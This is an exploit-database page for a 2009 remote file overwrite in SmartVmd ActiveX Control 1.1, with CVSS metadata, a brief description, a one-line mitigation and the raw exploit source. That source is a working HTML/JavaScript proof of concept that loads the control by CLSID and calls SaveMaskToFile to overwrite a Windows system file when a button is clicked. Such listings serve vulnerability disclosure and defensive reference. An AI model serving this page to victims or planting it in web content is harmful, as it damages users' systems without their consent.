header-logo
Suggest Exploit
vendor:
SmartVmd ActiveX Control
by:
Houssamix
9.3
CVSS
HIGH
Remote File Overwrite
264
CWE
Product Name: SmartVmd ActiveX Control
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:smartvmd:smartvmd_activex_control
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

SmartVmd ActiveX v 1.1 remote File Overwrite Exploit

This exploit allows an attacker to overwrite a file on the target system. The exploit uses the SaveMaskToFile method of the SmartVmd ActiveX control (clsid:{E3462D53-47A6-11D8-8EF6-DAE89272743C}) to overwrite the file. The exploit is triggered by clicking on a malicious button.

Mitigation:

The user should not visit untrusted websites or click on malicious buttons.
Source

Exploit-DB raw data:

<HTML>
<BODY>

<b>   
	Author : Houssamix    <br/>  <br/>  <br/>

   	SmartVmd ActiveX v 1.1 remote File Overwrite Exploit   <br/>

	download : http://www.smartvmd.com/setup/SetupActiveXVmd.msi  <br/>
<b/>


<object id=hsmx classid="clsid:{E3462D53-47A6-11D8-8EF6-DAE89272743C}"></object>

<SCRIPT>
/*

Report for Clsid: {E3462D53-47A6-11D8-8EF6-DAE89272743C}
RegKey Safe for Script: Faux
RegKey Safe for Init: Faux
Implements IObjectSafety: Vrai
IDisp Safe:  Safe for untrusted: caller  

*/
function hehe()
 {
     File = "c:\\windows\\system_.ini"
   hsmx.SaveMaskToFile(File)
 }

</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body>
</HTML>

# milw0rm.com [2009-01-19]